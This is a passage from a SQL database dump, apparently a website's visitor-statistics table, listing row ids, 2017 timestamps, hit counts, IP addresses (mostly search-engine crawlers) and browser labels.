178.154.189.3','other'),(131062,1499646915,1,1,0,0,'51.255.65.51','other'),(131063,1499647661,1,1,0,0,'217.182.132.180','other'),(131064,1499647695,1,0,1,0,'66.249.76.93',''),(131065,1499647857,1,1,0,0,'51.255.71.98','other'),(131066,1499648023,1,1,0,0,'217.69.133.6','other'),(131067,1499648255,1,1,0,0,'51.255.65.16','other'),(131068,1499648505,1,1,0,0,'217.182.132.95','other'),(131069,1499648839,1,1,0,0,'217.182.132.14','other'),(131070,1499649314,1,1,0,0,'51.255.65.72','other'),(131071,1499649373,1,1,0,0,'93.158.152.79','other'),(131072,1499649746,1,1,0,0,'217.182.132.37','other'),(131073,1499649762,1,1,0,0,'141.8.142.97','other'),(131074,1499649825,1,1,0,0,'217.182.132.176','other'),(131075,1499649891,2,2,0,0,'216.244.66.246','other'),(131076,1499650105,1,1,0,0,'217.182.132.60','other'),(131077,1499650205,1,1,0,0,'51.255.71.130','other'),(131078,1499650297,1,1,0,0,'137.74.207.110','other'),(131079,1499650531,1,1,0,0,'141.8.142.38','other'),(131080,1499650613,1,1,0,0,'8.29.198.25','other'),(131081,1499650854,1,1,0,0,'217.182.132.64','other'),(131082,1499651058,1,0,1,0,'66.249.76.91',''),(131083,1499651156,1,1,0,0,'5.255.253.31','other'),(131084,1499651160,1,1,0,0,'95.108.179.8','other'),(131085,1499651828,1,1,0,0,'207.46.13.71','other'),(131086,1499651902,3,3,0,0,'216.244.66.246','other'),(131087,1499652330,1,1,0,0,'217.182.132.62','other'),(131088,1499652734,1,0,1,0,'68.180.231.23',''),(131089,1499652864,1,1,0,0,'51.255.65.95','other'),(131090,1499653075,2,2,0,0,'216.244.66.194','other'),(131091,1499653380,1,1,0,0,'141.0.12.245','other'),(131092,1499653549,1,1,0,0,'51.255.65.81','other'),(131093,1499653834,1,1,0,0,'51.255.65.24','other'),(131094,1499653864,1,1,0,0,'51.255.71.127','other'),(131095,1499653965,1,1,0,0,'217.182.132.88','other'),(131096,1499654503,1,1,0,0,'51.255.65.54','other'),(131097,1499654515,1,1,0,0,'95.108.179.15','other'),(131098,1499654625,31,31,0,0,'208.43.225.84','other'),(131099,1499654700,24,24,0,0,'208.43.225.85','other'),(131100,1499654760,1,1,0,0,'51.255.65.11','other'),(131101,1499654997,1,1,0,0,'95.108.213.7','other'),(131102,1499655030,1,0,1,0,'66.249.66.74',''),(131103,1499655271,1,1,0,0,'217.69.133.2','other'),(131104,1499655290,1,1,0,0,'217.69.133.5','other'),(131105,1499656006,1,1,0,0,'137.74.207.161','other'),(131106,1499656087,1,1,0,0,'137.74.207.108','other'),(131107,1499656416,1,1,0,0,'5.255.253.58','other'),(131108,1499657579,1,1,0,0,'178.154.189.16','other'),(131109,1499657656,1,1,0,0,'216.244.66.246','other'),(131110,1499657981,1,1,0,0,'51.255.65.44','other'),(131111,1499658008,1,1,0,0,'217.182.132.69','other'),(131112,1499658761,1,1,0,0,'37.73.253.61','chrome'),(131113,1499658830,1,1,0,0,'207.46.13.71','other'),(131114,1499658846,1,1,0,0,'66.249.76.108','chrome'),(131115,1499659586,1,0,1,0,'66.249.76.107',''),(131116,1499660336,1,1,0,0,'51.255.65.12','other'),(131117,1499660357,4,4,0,0,'216.244.66.194','other'),(131118,1499660467,1,1,0,0,'217.182.132.154','other'),(131119,1499660744,1,1,0,0,'137.74.207.114','other'),(131120,1499660786,1,1,0,0,'217.182.132.31','other'),(131121,1499661147,1,1,0,0,'217.182.132.241','other'),(131122,1499661238,1,1,0,0,'91.196.178.66','firefox'),(131123,1499661438,1,1,0,0,'8.29.198.25','other'),(131124,1499661725,1,1,0,0,'217.182.132.68','other'),(131125,1499662053,1,1,0,0,'51.255.71.112','other'),(131126,1499662248,1,1,0,0,'217.69.133.5','other'),(131127,1499662405,1,1,0,0,'87.250.224.8','other'),(131128,1499662411,1,0,1,0,'66.249.66.75',''),(131129,1499662492,1,1,0,0,'87.250.224.18','other'),(131130,1499662606,1,1,0,0,'51.255.71.101','other'),(131131,1499662650,1,1,0,0,'93.158.152.79','other'),(131132,1499662784,1,1,0,0,'51.255.65.85','other'),(131133,1499662817,1,0,1,0,'66.249.76.108',''),(131134,1499663491,2,2,0,0,'216.244.66.246','other'),(131135,1499664199,1,0,1,0,'66.249.76.108',''),(131136,1499664200,1,1,0,0,'51.255.65.74','other'),(131137,1499664984,1,1,0,0,'217.69.133.9','other'),(131138,1499665050,1,1,0,0,'217.182.132.153','other'),(131139,1499665190,1,1,0,0,'178.92.142.211','chrome'),(131140,1499665240,1,1,0,0,'141.8.132.72','other'),(131141,1499665263,1,1,0,0,'51.255.71.113','other'),(131142,1499665268,1,1,0,0,'217.182.132.178','other'),(131143,1499666410,2,2,0,0,'176.102.196.156','chrome'),(131144,1499666909,1,1,0,0,'141.8.132.72','other'),(131145,1499666912,1,1,0,0,'141.8.142.91','other'),(131146,1499666953,1,1,0,0,'178.154.149.1','other'),(131147,1499667553,4,4,0,0,'216.244.66.194','other'),(131148,1499667710,1,1,0,0,'217.182.132.55','other'),(131149,1499667905,1,1,0,0,'217.69.133.9','other'),(131150,1499668034,1,1,0,0,'207.46.13.71','other'),(131151,1499668218,1,1,0,0,'51.255.65.79','other'),(131152,1499668498,1,1,0,0,'91.124.28.88','chrome'),(131153,1499668853,1,1,0,0,'66.249.76.108','chrome'),(131154,1499669043,1,1,0,0,'217.182.132.154','other'),(131155,1499669149,1,1,0,0,'217.182.132.176','other'),(131156,1499669488,1,1,0,0,'176.31.231.10','other'),(131157,1499669560,1,1,0,0,'217.182.132.179','other'),(131158,1499669719,1,1,0,0,'141.8.142.97','other'),(131159,1499670392,1,1,0,0,'51.255.65.78','other'),(131160,1499670474,1,1,0,0,'51.255.65.31','other'),(131161,1499670876,1,1,0,0,'66.102.9.27','chrome'),(131162,1499671254,1,1,0,0,'188.0.80.85','opera'),(131163,1499671379,1,1,0,0,'66.249.76.109','chrome'),(131164,1499672272,1,1,0,0,'8.29.198.27','other'),(131165,1499672336,3,3,0,0,'216.244.66.246','other'),(131166,1499672837,1,1,0,0,'217.182.132.190','other'),(131167,1499672953,1,1,0,0,'217.182.132.88','other'),(131168,1499673012,1,1,0,0,'51.255.65.78','other'),(131169,1499673193,1,1,0,0,'66.249.76.93','chrome'),(131170,1499673415,1,1,0,0,'217.182.132.70','other'),(131171,1499673442,1,1,0,0,'217.182.132.29','other'),(131172,1499673481,1,1,0,0,'93.158.152.79','other'),(131173,1499673866,1,1,0,0,'178.154.200.37','other'),(131174,1499673919,1,1,0,0,'141.8.142.154','other'),(131175,1499673950,1,1,0,0,'216.244.66.194','other'),(131176,1499673985,5,5,0,0,'208.110.93.52','other'),(131177,1499674155,1,1,0,0,'51.255.65.75','other'),(131178,1499674179,1,1,0,0,'51.255.65.31','other'),(131179,1499674854,1,0,1,0,'66.249.66.156',''),(131180,1499674961,2,2,0,0,'91.209.11.236','other'),(131181,1499675375,1,1,0,0,'217.182.132.173','other'),(131182,1499675433,1,1,0,0,'141.8.142.97','other'),(131183,1499676075,1,1,0,0,'91.196.178.168','chrome'),(131184,1499676154,1,1,0,0,'217.182.132.72','other'),(131185,1499676452,2,2,0,0,'198.204.225.34','msie'),(131186,1499676505,1,1,0,0,'91.196.178.164','firefox'),(131187,1499677028,1,1,0,0,'91.196.178.65','chrome'),(131188,1499677230,1,1,0,0,'130.180.211.91','firefox'),(131189,1499677235,1,1,0,0,'207.46.13.71','other'),(131190,1499677762,1,1,0,0,'178.92.251.62','chrome'),(131191,1499678048,1,1,0,0,'91.196.178.68','firefox'),(131192,1499678372,1,1,0,0,'216.244.66.194','other'),(131193,1499678621,1,1,0,0,'51.255.71.101','other'),(131194,1499679058,1,1,0,0,'217.182.132.34','other'),(131195,1499679939,1,1,0,0,'51.255.71.101','other'),(131196,1499680131,1,1,0,0,'137.74.201.99','other'),(131197,1499680200,1,1,0,0,'37.55.150.88','chrome'),(131198,1499680203,1,1,0,0,'164.132.162.157','other'),(131199,1499680218,1,1,0,0,'51.255.71.120','other'),(131200,1499680495,1,1,0,0,'217.182.132.87','other'),(131201,1499680618,1,1,0,0,'95.108.179.15','other'),(131202,1499680816,1,1,0,0,'5.255.253.81','other'),(131203,1499681126,1,1,0,0,'91.196.178.65','chrome'),(131204,1499681399,2,2,0,0,'91.121.86.136','other'),(131205,1499681590,1,1,0,0,'130.180.217.189','chrome'),(131206,1499681607,1,1,0,0,'216.244.66.194','other'),(131207,1499681822,2,2,0,0,'217.25.199.101','chrome'),(131208,1499681915,1,1,0,0,'137.74.207.101','other'),(131209,1499682088,1,0,1,0,'66.249.76.108',''),(131210,1499682492,1,1,0,0,'216.244.66.246','other'),(131211,1499682564,1,1,0,0,'207.46.13.71','other'),(131212,1499682809,1,1,0,0,'141.8.183.1','other'),(131213,1499682840,1,1,0,0,'217.182.132.27','other'),(131214,1499682990,1,1,0,0,'217.182.132.29','other'),(131215,1499683110,1,1,0,0,'8.29.198.27','other'),(131216,1499683198,1,1,0,0,'217.182.132.14','other'),(131217,1499683217,1,1,0,0,'66.249.76.107','chrome'),(131218,1499683474,1,1,0,0,'217.69.133.194','other'),(131219,1499683494,1,1,0,0,'51.255.65.38','other'),(131220,1499683723,1,1,0,0,'180.76.15.8','other'),(131221,1499684038,1,1,0,0,'137.74.207.119','other'),(131222,1499684373,1,1,0,0,'51.255.65.90','other'),(131223,1499684849,1,1,0,0,'217.182.132.20','other'),(131224,1499684920,1,1,0,0,'217.69.133.9','other'),(131225,1499684951,1,1,0,0,'217.69.133.2','other'),(131226,1499685172,1,1,0,0,'180.76.15.156','other'),(131227,1499685221,1,1,0,0,'139.59.131.4','other'),(131228,1499685260,1,1,0,0,'51.255.65.44','other'),(131229,1499685311,1,1,0,0,'217.182.132.60','other'),(131230,1499685509,1,1,0,0,'195.10.210.49','chrome'),(131231,1499685816,1,0,1,0,'68.180.230.48',''),(131232,1499685830,1,1,0,0,'37.55.150.88','firefox'),(131233,1499686467,1,1,0,0,'137.74.207.102','other'),(131234,1499686705,1,1,0,0,'91.196.178.66','firefox'),(131235,1499686950,1,1,0,0,'46.200.72.85','chrome'),(131236,1499686973,1,1,0,0,'95.132.23.63','firefox'),(131237,1499686986,1,1,0,0,'87.250.224.7','other'),(131238,1499687014,1,1,0,0,'217.182.132.25','other'),(131239,1499687315,2,2,0,0,'216.244.66.194','other'),(131240,1499687506,1,1,0,0,'217.182.132.27','other'),(131241,1499687813,1,1,0,0,'217.182.132.67','other'),(131242,1499687815,1,1,0,0,'91.196.178.68','chrome'),(131243,1499687833,3,3,0,0,'95.108.213.34','other'),(131244,1499687844,1,1,0,0,'95.108.179.15','other'),(131245,1499687868,1,1,0,0,'217.182.132.81','other'),(131246,1499688105,1,1,0,0,'217.182.132.183','other'),(131247,1499688232,1,1,0,0,'212.111.198.100','chrome'),(131248,1499688370,1,1,0,0,'217.182.132.187','other'),(131249,1499688528,1,1,0,0,'95.132.102.160','chrome'),(131250,1499688756,1,1,0,0,'51.255.65.71','other'),(131251,1499689053,4,4,0,0,'216.244.66.246','other'),(131252,1499689163,1,1,0,0,'217.69.133.194','other'),(131253,1499689351,1,1,0,0,'91.196.178.165','chrome'),(131254,1499689492,1,1,0,0,'66.249.76.107','chrome'),(131255,1499689868,1,1,0,0,'176.111.33.18','chrome'),(131256,1499690473,1,1,0,0,'141.8.142.164','other'),(131257,1499690477,1,1,0,0,'95.108.213.8','other'),(131258,1499690604,1,1,0,0,'217.182.132.150','other'),(131259,1499690623,1,1,0,0,'5.255.253.81','other'),(131260,1499690882,1,1,0,0,'217.182.132.52','other'),(131261,1499690964,1,1,0,0,'157.55.39.35','other'),(131262,1499691332,5,5,0,0,'216.244.66.194','other'),(131263,1499692168,1,1,0,0,'91.196.178.168','chrome'),(131264,1499692341,1,1,0,0,'217.77.210.116','chrome'),(131265,1499692501,1,1,0,0,'46.201.12.121','chrome'),(131266,1499692578,1,1,0,0,'46.200.255.32','chrome'),(131267,1499692806,1,1,0,0,'5.255.253.81','other'),(131268,1499692967,1,1,0,0,'217.182.132.66','other'),(131269,1499693950,1,1,0,0,'8.29.198.25','other'),(131270,1499693986,1,1,0,0,'5.255.253.58','other'),(131271,1499694079,1,1,0,0,'37.55.151.241','firefox'),(131272,1499694180,1,1,0,0,'94.178.234.207','chrome'),(131273,1499694362,3,3,0,0,'216.244.66.246','other'),(131274,1499694564,2,2,0,0,'216.244.66.194','other'),(131275,1499694958,1,1,0,0,'141.8.142.97','other'),(131276,1499695754,1,1,0,0,'5.255.253.28','other'),(131277,1499696319,1,1,0,0,'178.154.189.22','other'),(131278,1499696327,1,1,0,0,'217.69.133.194','other'),(131279,1499696337,1,1,0,0,'141.8.142.97','other'),(131280,1499696756,1,1,0,0,'207.46.13.71','other'),(131281,1499696873,1,1,0,0,'217.182.132.64','other'),(131282,1499697149,1,1,0,0,'178.154.189.3','other'),(131283,1499697530,5,5,0,0,'216.244.66.246','other'),(131284,1499697712,1,1,0,0,'217.182.132.69','other'),(131285,1499697737,1,1,0,0,'217.182.132.149','other'),(131286,1499697942,1,1,0,0,'91.196.178.98','chrome'),(131287,1499697996,1,1,0,0,'37.9.113.38','other'),(131288,1499697998,1,1,0,0,'95.108.179.8','other'),(131289,1499698146,1,1,0,0,'141.8.142.42','other'),(131290,1499698493,1,1,0,0,'162.210.196.129','other'),(131291,1499698602,2,2,0,0,'216.244.66.237','other'),(131292,1499698925,1,1,0,0,'217.69.133.5','other'),(131293,1499699011,1,1,0,0,'51.255.71.123','other'),(131294,1499699014,1,1,0,0,'141.8.132.43','other'),(131295,1499699441,1,1,0,0,'51.255.65.59','other'),(131296,1499700463,1,1,0,0,'217.69.133.9','other'),(131297,1499700476,6,6,0,0,'216.244.66.194','other'),(131298,1499700542,1,1,0,0,'217.182.132.66','other'),(131299,1499700864,1,1,0,0,'217.182.132.21','other'),(131300,1499701077,1,1,0,0,'51.255.65.79','other'),(131301,1499701099,1,1,0,0,'217.182.132.187','other'),(131302,1499701313,1,1,0,0,'91.196.178.66','firefox'),(131303,1499702142,1,1,0,0,'217.69.133.9','other'),(131304,1499702440,1,1,0,0,'51.255.71.114','other'),(131305,1499702461,1,1,0,0,'176.118.48.18','chrome'),(131306,1499702621,1,1,0,0,'51.255.65.8','other'),(131307,1499702782,2,2,0,0,'216.244.66.246','other'),(131308,1499702855,1,1,0,0,'51.255.71.101','other'),(131309,1499703109,1,1,0,0,'164.132.162.155','other'),(131310,1499703244,1,0,1,0,'66.249.76.107',''),(131311,1499703726,1,1,0,0,'51.255.65.24','other'),(131312,1499703837,1,1,0,0,'91.196.178.161','chrome'),(131313,1499704631,1,1,0,0,'195.154.251.162','chrome'),(131314,1499704634,1,1,0,0,'217.182.132.69','other'),(131315,1499704789,1,1,0,0,'8.29.198.25','other'),(131316,1499705475,1,1,0,0,'51.255.65.62','other'),(131317,1499705638,4,4,0,0,'216.244.66.194','other'),(131318,1499705682,1,1,0,0,'178.154.200.45','other'),(131319,1499705789,1,1,0,0,'66.249.66.75','chrome'),(131320,1499705980,1,1,0,0,'164.132.162.155','other'),(131321,1499706026,1,1,0,0,'51.255.65.11','other'),(131322,1499706231,1,1,0,0,'51.255.65.44','other'),(131323,1499706494,1,1,0,0,'185.26.180.87','other'),(131324,1499706537,1,1,0,0,'51.255.71.125','other'),(131325,1499706610,1,1,0,0,'217.182.132.146','other'),(131326,1499706930,1,1,0,0,'137.74.207.159','other'),(131327,1499707004,1,1,0,0,'46.211.66.162','chrome'),(131328,1499707085,1,0,1,0,'66.249.76.89',''),(131329,1499707441,1,1,0,0,'217.182.132.4','other'),(131330,1499707681,1,1,0,0,'87.250.224.7','other'),(131331,1499707909,2,2,0,0,'217.69.133.5','other'),(131332,1499707910,1,1,0,0,'217.182.132.23','other'),(131333,1499708303,1,1,0,0,'217.182.132.92','other'),(131334,1499708319,2,2,0,0,'216.244.66.246','other'),(131335,1499708536,1,1,0,0,'51.255.71.132','other'),(131336,1499708572,1,1,0,0,'51.255.71.98','other'),(131337,1499708689,1,1,0,0,'180.76.15.149','other'),(131338,1499709213,1,1,0,0,'217.182.132.240','other'),(131339,1499709385,1,1,0,0,'51.255.71.133','other'),(131340,1499710093,1,1,0,0,'51.255.65.91','other'),(131341,1499710409,1,1,0,0,'217.69.133.2','other'),(131342,1499710807,1,1,0,0,'180.76.15.156','other'),(131343,1499710945,1,1,0,0,'51.255.65.80','other'),(131344,1499711279,1,1,0,0,'51.255.71.98','other'),(131345,1499711567,1,1,0,0,'66.249.76.93','chrome'),(131346,1499711996,2,2,0,0,'95.108.213.34','other'),(131347,1499712402,1,1,0,0,'51.255.65.25','other'),(131348,1499713077,1,1,0,0,'95.108.213.34','other'),(131349,1499713107,1,1,0,0,'95.108.179.15','other'),(131350,1499713336,1,1,0,0,'91.196.178.103','chrome'),(131351,1499713746,1,1,0,0,'51.255.65.90','other'),(131352,1499714109,1,1,0,0,'95.108.213.34','other'),(131353,1499714223,1,1,0,0,'66.249.93.89','chrome'),(131354,1499714821,1,1,0,0,'51.255.71.122','other'),(131355,1499715071,1,1,0,0,'216.244.66.237','other'),(131356,1499715192,1,1,0,0,'178.92.117.172','other'),(131357,1499715275,1,1,0,0,'217.182.132.6','other'),(131358,1499715445,4,4,0,0,'216.244.66.246','other'),(131359,1499715627,1,1,0,0,'8.29.198.27','other'),(131360,1499715641,1,1,0,0,'95.108.213.34','other'),(131361,1499716115,1,1,0,0,'217.182.132.190','other'),(131362,1499716788,2,2,0,0,'216.244.66.194','other'),(131363,1499717900,1,1,0,0,'217.69.133.203','other'),(131364,1499719023,1,1,0,0,'51.255.64.106','other'),(131365,1499719224,1,1,0,0,'51.255.71.111','other'),(131366,1499719250,1,1,0,0,'95.108.179.15','other'),(131367,1499719757,1,0,1,0,'66.249.66.74',''),(131368,1499720481,1,1,0,0,'217.182.132.52','other'),(131369,1499720531,1,0,1,0,'66.249.76.89',''),(131370,1499720799,1,1,0,0,'217.182.132.147','other'),(131371,1499721000,1,1,0,0,'217.182.132.152','other'),(131372,1499721019,1,1,0,0,'51.255.65.72','other'),(131373,1499721817,1,1,0,0,'51.255.65.76','other'),(131374,1499722333,1,1,0,0,'91.209.11.236','other'),(131375,1499722530,1,1,0,0,'51.255.65.27','other'),(131376,1499723165,1,1,0,0,'95.108.213.34','other'),(131377,1499723171,1,0,1,0,'66.249.76.109',''),(131378,1499723213,1,1,0,0,'217.182.132.193','other'),(131379,1499724045,1,1,0,0,'79.143.42.90','other'),(131380,1499724623,3,3,0,0,'216.244.66.246','other'),(131381,1499724675,1,1,0,0,'46.161.9.55','chrome'),(131382,1499725918,1,1,0,0,'51.255.65.49','other'),(131383,1499726462,1,1,0,0,'8.29.198.25','other'),(131384,1499726679,2,2,0,0,'216.244.66.194','other'),(131385,1499726714,1,1,0,0,'217.182.132.76','other'),(131386,1499727791,1,1,0,0,'95.108.213.34','other'),(131387,1499727919,1,1,0,0,'141.8.142.154','other'),(131388,1499728190,1,1,0,0,'51.255.65.47','other'),(131389,1499728270,1,1,0,0,'217.182.132.27','other'),(131390,1499728322,1,1,0,0,'217.182.132.75','other'),(131391,1499728437,1,1,0,0,'51.255.65.74','other'),(131392,1499729379,1,1,0,0,'51.255.65.93','other'),(131393,1499730152,1,1,0,0,'95.108.179.15','other'),(131394,1499730163,1,1,0,0,'164.132.162.159','other'),(131395,1499730595,1,1,0,0,'217.182.132.27','other'),(131396,1499731495,1,0,1,0,'66.249.76.91',''),(131397,1499731699,1,1,0,0,'195.154.251.162','chrome'),(131398,1499731738,1,1,0,0,'95.108.213.34','other'),(131399,1499732285,1,1,0,0,'217.182.132.64','other'),(131400,1499732826,1,1,0,0,'51.255.71.131','other'),(131401,1499733376,1,1,0,0,'217.182.132.92','other'),(131402,1499733422,1,1,0,0,'217.69.133.3','other'),(131403,1499733426,1,1,0,0,'217.69.133.5','other'),(131404,1499733430,1,1,0,0,'217.69.133.9','other'),(131405,1499733478,1,1,0,0,'95.108.179.21','other'),(131406,1499733618,2,2,0,0,'87.250.224.7','other'),(131407,1499734051,1,1,0,0,'217.182.132.150','other'),(131408,1499734082,1,1,0,0,'51.255.65.41','other'),(131409,1499734393,1,1,0,0,'216.244.66.246','other'),(131410,1499734975,1,1,0,0,'91.209.11.236','other'),(131411,1499735238,1,0,1,0,'66.249.76.91',''),(131412,1499735297,1,1,0,0,'51.255.65.12','other'),(131413,1499736088,1,1,0,0,'95.108.179.15','other'),(131414,1499736283,1,1,0,0,'216.244.66.246','other'),(131415,1499736693,1,1,0,0,'217.69.133.203','other'),(131416,1499736826,1,1,0,0,'66.249.76.91','chrome'),(131417,1499737051,2,2,0,0,'95.108.213.34','other'),(131418,1499737075,1,1,0,0,'51.255.65.71','other'),(131419,1499737293,1,1,0,0,'8.29.198.27','other'),(131420,1499737539,3,3,0,0,'208.110.93.52','other'),(131421,1499737589,1,1,0,0,'51.255.65.15','other'),(131422,1499737628,1,0,1,0,'66.249.66.155',''),(131423,1499737685,1,1,0,0,'51.255.65.83','other'),(131424,1499737802,1,1,0,0,'157.55.39.178','other'),(131425,1499738022,1,1,0,0,'164.132.162.155','other'),(131426,1499738822,1,1,0,0,'51.255.65.65','other'),(131427,1499739111,1,1,0,0,'217.182.132.179','other'),(131428,1499739448,1,1,0,0,'217.182.132.32','other'),(131429,1499739959,1,1,0,0,'51.255.65.6','other'),(131430,1499741174,1,1,0,0,'51.255.65.80','other'),(131431,1499741194,1,0,1,0,'66.249.76.93',''),(131432,1499741378,1,1,0,0,'216.244.66.246','other'),(131433,1499741447,1,1,0,0,'137.74.207.188','other'),(131434,1499741472,1,1,0,0,'51.255.71.132','other'),(131435,1499742481,1,1,0,0,'51.255.65.58','other'),(131436,1499742751,1,1,0,0,'87.250.224.7','other'),(131437,1499743091,1,1,0,0,'51.255.71.115','other'),(131438,1499743403,1,1,0,0,'141.0.12.241','other'),(131439,1499743660,1,1,0,0,'217.182.132.72','other'),(131440,1499743749,1,1,0,0,'95.108.213.34','other'),(131441,1499743803,1,1,0,0,'95.108.179.15','other'),(131442,1499743940,1,1,0,0,'216.244.66.237','other'),(131443,1499743992,1,1,0,0,'51.255.65.90','other'),(131444,1499744354,1,1,0,0,'217.182.132.57','other'),(131445,1499744575,1,1,0,0,'93.75.151.75','firefox'),(131446,1499744906,3,3,0,0,'46.229.168.75','other'),(131447,1499744924,6,6,0,0,'46.229.168.69','other'),(131448,1499744942,2,2,0,0,'46.229.168.74','other'),(131449,1499744960,6,6,0,0,'46.229.168.79','other'),(131450,1499745008,2,2,0,0,'46.229.168.78','other'),(131451,1499745032,9,9,0,0,'46.229.168.80','other'),(131452,1499745050,6,6,0,0,'46.229.168.71','other'),(131453,1499745086,4,4,0,0,'46.229.168.73','other'),(131454,1499745122,5,5,0,0,'46.229.168.67','other'),(131455,1499745284,4,4,0,0,'46.229.168.65','other'),(131456,1499745287,1,1,0,0,'137.74.207.161','other'),(131457,1499745298,1,1,0,0,'217.182.132.17','other'),(131458,1499745317,1,1,0,0,'137.74.207.170','other'),(131459,1499745320,5,5,0,0,'46.229.168.68','other'),(131460,1499745360,3,3,0,0,'46.229.168.66','other'),(131461,1499745441,3,3,0,0,'46.229.168.72','other'),(131462,1499745444,1,1,0,0,'51.255.65.64','other'),(131463,1499745536,2,2,0,0,'46.229.168.76','other'),(131464,1499745544,6,6,0,0,'46.229.168.70','other'),(131465,1499745667,2,2,0,0,'46.229.168.77','other'),(131466,1499745725,1,1,0,0,'217.182.132.21','other'),(131467,1499745879,1,1,0,0,'46.229.168.69','other'),(131468,1499745987,1,1,0,0,'46.229.168.75','other'),(131469,1499746023,1,1,0,0,'46.229.168.71','other'),(131470,1499746041,1,1,0,0,'46.229.168.73','other'),(131471,1499746055,1,0,1,0,'66.249.66.74',''),(131472,1499746092,1,1,0,0,'51.255.65.85','other'),(131473,1499746312,1,0,1,0,'66.249.66.157',''),(131474,1499746366,1,1,0,0,'51.255.65.17','other'),(131475,1499746447,1,1,0,0,'95.108.213.34','other'),(131476,1499746940,1,1,0,0,'217.182.132.52','other'),(131477,1499747153,3,3,0,0,'216.244.66.194','other'),(131478,1499747156,1,1,0,0,'217.69.133.203','other'),(131479,1499747161,1,1,0,0,'217.69.133.5','other'),(131480,1499747305,1,1,0,0,'180.76.15.27','other'),(131481,1499747778,1,1,0,0,'51.255.65.49','other'),(131482,1499748133,1,1,0,0,'8.29.198.26','other'),(131483,1499748167,1,1,0,0,'217.69.133.5','other'),(131484,1499748217,1,1,0,0,'66.249.66.75','chrome'),(131485,1499748276,2,2,0,0,'216.244.66.246','other'),(131486,1499748825,1,1,0,0,'66.249.76.93','chrome'),(131487,1499748943,1,1,0,0,'141.8.142.91','other'),(131488,1499749040,1,1,0,0,'217.182.132.59','other'),(131489,1499749173,1,1,0,0,'91.196.178.66','firefox'),(131490,1499749215,1,1,0,0,'51.255.65.82','other'),(131491,1499749479,1,1,0,0,'51.255.65.16','other'),(131492,1499749682,1,1,0,0,'141.8.142.42','other'),(131493,1499749690,1,1,0,0,'217.182.132.16','other'),(131494,1499750210,1,0,1,0,'66.249.76.107',''),(131495,1499751037,1,0,1,0,'66.249.66.75',''),(131496,1499751088,1,1,0,0,'5.255.253.31','other'),(131497,1499751169,1,1,0,0,'51.255.65.43','other'),(131498,1499751360,1,1,0,0,'91.196.178.66','chrome'),(131499,1499751505,1,1,0,0,'37.9.113.38','other'),(131500,1499751531,2,2,0,0,'216.244.66.246','other'),(131501,1499751800,1,1,0,0,'217.182.132.190','other'),(131502,1499751869,1,1,0,0,'91.196.178.163','chrome'),(131503,1499751963,1,1,0,0,'178.154.200.45','other'),(131504,1499752193,1,1,0,0,'91.196.178.67','firefox'),(131505,1499752377,1,1,0,0,'157.55.39.178','other'),(131506,1499752763,1,1,0,0,'51.255.65.6','other'),(131507,1499752915,1,1,0,0,'66.249.76.107','chrome'),(131508,1499752928,1,1,0,0,'51.255.65.29','other'),(131509,1499753044,1,1,0,0,'51.255.65.78','other'),(131510,1499753082,1,1,0,0,'95.135.10.192','firefox'),(131511,1499753083,1,1,0,0,'66.249.76.108','chrome'),(131512,1499753216,1,1,0,0,'51.255.65.52','other'),(131513,1499753281,1,1,0,0,'51.255.71.110','other'),(131514,1499753371,1,1,0,0,'207.46.13.132','other'),(131515,1499753773,1,1,0,0,'207.46.13.71','other'),(131516,1499753867,1,1,0,0,'217.182.132.56','other'),(131517,1499754006,1,1,0,0,'217.69.133.194','other'),(131518,1499754620,1,1,0,0,'51.255.65.39','other'),(131519,1499754745,1,1,0,0,'216.244.66.237','other'),(131520,1499754960,1,1,0,0,'93.158.152.107','other'),(131521,1499755109,1,1,0,0,'91.196.178.66','chrome'),(131522,1499755176,1,1,0,0,'51.255.65.33','other'),(131523,1499755327,2,2,0,0,'5.9.79.151','other'),(131524,1499755354,1,0,1,0,'66.249.66.75',''),(131525,1499755440,2,2,0,0,'216.244.66.246','other'),(131526,1499755964,1,1,0,0,'51.255.65.20','other'),(131527,1499756004,1,1,0,0,'51.255.71.121','other'),(131528,1499756061,1,1,0,0,'217.182.132.240','other'),(131529,1499756227,1,1,0,0,'217.182.132.72','other'),(131530,1499756346,4,4,0,0,'62.210.101.101','other'),(131531,1499756397,1,1,0,0,'217.69.133.4','other'),(131532,1499756404,1,1,0,0,'137.74.207.159','other'),(131533,1499756560,2,2,0,0,'216.244.66.194','other'),(131534,1499756665,1,1,0,0,'51.255.65.24','other'),(131535,1499756821,1,1,0,0,'51.255.71.101','other'),(131536,1499757079,1,1,0,0,'46.219.33.172','firefox'),(131537,1499757129,1,1,0,0,'194.44.17.38','chrome'),(131538,1499757248,1,1,0,0,'51.255.65.51','other'),(131539,1499757249,1,1,0,0,'46.219.6.40','chrome'),(131540,1499757731,1,0,1,0,'66.249.76.89',''),(131541,1499757825,1,1,0,0,'141.8.142.164','other'),(131543,1499758543,1,1,0,0,'51.255.65.70','other'),(131544,1499758965,1,1,0,0,'8.29.198.27','other'),(131545,1499759194,1,1,0,0,'217.182.132.240','other'),(131546,1499759200,1,1,0,0,'137.74.207.164','other'),(131547,1499759250,1,1,0,0,'217.182.132.62','other'),(131548,1499759280,2,2,0,0,'66.249.76.89','chrome'),(131549,1499759499,1,1,0,0,'141.8.142.154','other'),(131550,1499759535,1,1,0,0,'51.255.71.130','other'),(131551,1499759729,1,1,0,0,'217.182.132.34','other'),(131552,1499759817,1,1,0,0,'91.196.178.66','chrome'),(131553,1499759823,1,1,0,0,'217.69.133.4','other'),(131554,1499759900,1,1,0,0,'217.182.132.181','other'),(131555,1499760719,1,1,0,0,'217.182.132.85','other'),(131556,1499761283,1,1,0,0,'217.182.132.146','other'),(131557,1499761303,1,1,0,0,'46.161.9.55','chrome'),(131558,1499761365,1,1,0,0,'51.255.71.114','other'),(131559,1499761547,1,1,0,0,'95.108.179.15','other'),(131560,1499761926,1,1,0,0,'217.182.132.16','other'),(131561,1499762217,1,1,0,0,'195.184.218.146','chrome'),(131562,1499762228,1,1,0,0,'51.255.65.22','other'),(131563,1499762388,1,1,0,0,'217.182.132.65','other'),(131564,1499762432,1,1,0,0,'164.132.162.160','other'),(131565,1499762523,1,1,0,0,'51.255.65.47','other'),(131566,1499762587,1,1,0,0,'217.182.132.6','other'),(131567,1499762809,1,0,1,0,'66.249.66.75',''),(131568,1499762857,3,3,0,0,'216.244.66.246','other'),(131569,1499762867,1,1,0,0,'51.255.65.57','other'),(131570,1499762986,1,1,0,0,'164.132.162.156','other'),(131571,1499763070,1,1,0,0,'51.255.65.77','other'),(131572,1499763298,1,1,0,0,'51.255.71.133','other'),(131573,1499763304,1,1,0,0,'91.196.178.163','chrome'),(131574,1499763737,1,1,0,0,'51.255.71.131','other'),(131575,1499763823,1,1,0,0,'91.209.11.236',